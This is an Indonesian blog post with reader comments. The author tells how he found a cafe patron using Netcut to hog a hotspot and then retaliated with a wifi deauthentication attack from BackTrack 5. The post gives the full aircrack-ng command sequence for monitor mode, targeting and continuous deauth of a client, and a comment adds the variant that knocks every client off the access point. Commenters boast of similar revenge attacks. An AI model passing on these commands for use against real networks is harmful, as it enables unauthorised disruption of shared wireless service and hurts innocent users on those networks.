WirelessHacking Deauth

Posted: Selasa, 18 Oktober 2011 | Diposting oleh rukmana mulya | Label: ,
Haloo temen temen saya mau cerita sedikit neh,beberapa hari yang lalu saya pergi ke Cafe,dimana seperti biasa saya mencari Cafe yang ada fasilitas Hotspotnya karna terus terang saja,saya tidak bisa jauh dari koneksi internet.

Setelah saya sampai pada sebuah Cafe di daerah Gatot Subroto Bandung,Sayapun langsung bergegas membuka laptop saya dan mencoba untuk mengonekan wifi saya pada hotspot di Cafe itu,Tujuanya yah Sekedar untuk buka email dan juga berfacebook ria sambil menunggu pesanan datang.

Selang beberapa menit terhubung dengan hotspot tersebut tiba tiba koneksinya terputus dan saya coba untuk mengonekanya kembali namun

tidak bisa terhubung,kadang terhubung tapi tidak bisa
masuk pada situs yang ingin saya buka.

Pasti ada yang tidak beres nih,dalam hati saya berkata,sayapun langsung melihat kondisi disekitar dan saya curiga pada seseorang yang berbadan agak gemuk memakai kacamata sedang asik duduk manis di depan laptopnya sambil ketawa ketiwi.

Dengan sedikit penasaran sayapun pura pura ke toilet dan sedikit melirik aktifitas yang sedang dialakukan di depan laptopnya.ternyata dugaan saya benar dia menggunakan salah satu sofware pemotong koneksi yang beredar di Internet namanya Netcut

Sekilas cara kerja netcut:

NetCut menjadikan laptop/komputernya sebagai gateway. Jadi dia bebas mengatur siapa yang masuk, dan siapa yang perlu ditendang keluar.
Bekerja berdasarkan ARP (Address Resolution Protocol) Spoofing.
Jadi dia mengelabui mac adress komputer satu Dengan IP adress Komputer lain.
Misal, komputer A mau komunikasi ke B. Tapi, tiba2 si C mengangu komunikasi. Karena sebelumnya si C sudah sukses melakukan penyusupan di bagian ARP.
Jadi si C bisa suka aja mau diapain tuh data yang sudah di bajak. Mau di putus, di sambung semua terserah padanya.

Yah kira kira begitulah cara kerja software tersebut sehingga apa boleh buat yang tidak mengerti masalah jaringan pasti dia tidak akan bisa menikmati fasilitas hotspot gratisan yang disediakan Cafe tersebut,dan pasti yang dilakukanya adalah menyolokan modem atau menutup kembali laptopnya.

Karna kesal sayapun mencoba menyiapkan alat perang yang saya miliki dan mencoba menyerang orang yang sudah menyabotase jaringan hotspot di cafe tersebut

Seperti biasa alat perang yang saya pergunakan adalah OS Backtrack 5

Saya menggunakan teknik Deauth dimana dengan teknik ini saya dapat mematikan koneksi client yang menggunakan Netcut itu tanpa harus conect pada hotspot tersebut ,bahkan dapat pula mematikan semua aktifitas jaringan pada hotspot di cafe itu,sehingga lalulintas jaringan akan terganggu dan tidak akan stabil.

sebelum melakukan penyerangan,seperti biasa saya mengaktifkan terlebih dahulu interface saya pada mode monitor,agar bisa melihat secara langsung aktifitas yang sedang berlangsung.

airmon-ng

keterangan : melihat interface kita

airmon-ng start wlan0

mengaktifkan interface pada mode monitor

airodump-ng mon0

keterangan: perintah untuk mulai memonitor jaringan

airodump-ng -c 1 --bssid XX:XX:XX:XX:XX mon0

keterangan: memonitor jaringan lebih sepsifik dimana

-c (chanell AP)

--bssid (mac address AP)

aireplay-ng -0 0 -c XX:XX:XX:XX:XX -a XX:XX:XX:XX:XX mon0

keterangan

aireplay-ng untuk mengirim paket data secara berulang ulang

-0 kode --deauth/ mematikan autentikasi station

0 = Jumlah / lama waktu mematikan autentikasi station berulang ulang

-c (MAC Address Target)

-a (Mac address AP)

Saya lakukan penyerangan ini selama 20 menit,dan apa yang terjadi hoho diapun langsung tidak berkutik dan bergegas untuk pulang.

Memang pada area free hotspot banyak sekali orang yang curang dan mempergunakan software2 tertentu agar dapat menikmati bandwith secara full hingga orang lain tidak kebagaian.untuk itu saya membuat tutorial ini buat jaga jaga saja apablia dilain waktu kita menemukan kejadian serupa,kita dapat menyerang balik

Ilustrasi videonya

10 komentar:

  1. Anonymous mengatakan...
  2. Kalo Nyerang Accsess pointnya gimana bos bisa juga?

  3. rukmana mulya mengatakan...
  4. Bisa om tinggal ketikan aireplay-ng -0 0 -a XX:XX:XX:XX:XX mon0

    jangan lama lama loh kasian :D

  5. rukmana mulya mengatakan...
  6. sama sama om mudah mudahan bermanfaat

  7. Anonymous mengatakan...
  8. Ok bos thanks infonya

  9. eben mengatakan...
  10. cocok neh dipergunakan kalo sedang hotspotan :D

  11. rukmana mulya mengatakan...
  12. om @eben haha kalo kedaan darurat baru aksi ini saya pergunakan :D

  13. Anonymous mengatakan...
  14. saya juga udah pernah bang rukmana,ini terjadi ketika online di kampus saya, ketiika itu saya ol pake windus karena tiba tiba ngeloaading terus alias konek ga bisa terus saya cek pake ping via cmd, wew connection time out ada apa ini? saya coba menggunakan portmonster plus ip scanner wew didapet 2 kompi yang statusnya sniffing,gue serang balik restart masuk ke backtrack live usb.. serbu,, mampus tu dua kompi.. hotspot cyber.. kunjungi blog ane ya gan di azysforever.blogspot.com

  15. rukmana mulya mengatakan...
  16. hahahaha keren,ok sob ntar ane mampir ke sana

  17. AYRIY ZONE mengatakan...
  18. harus pake backtrack sob, ada software untuk hack wifi gak sob,,

  19. rukmana mulya mengatakan...
  20. @AYRIY ZONEia sob pake backtrack cocok banget buat networking penetration,hack wifi juga bisa sob,baca aja artikel saya tentang hack wifi

Posting Komentar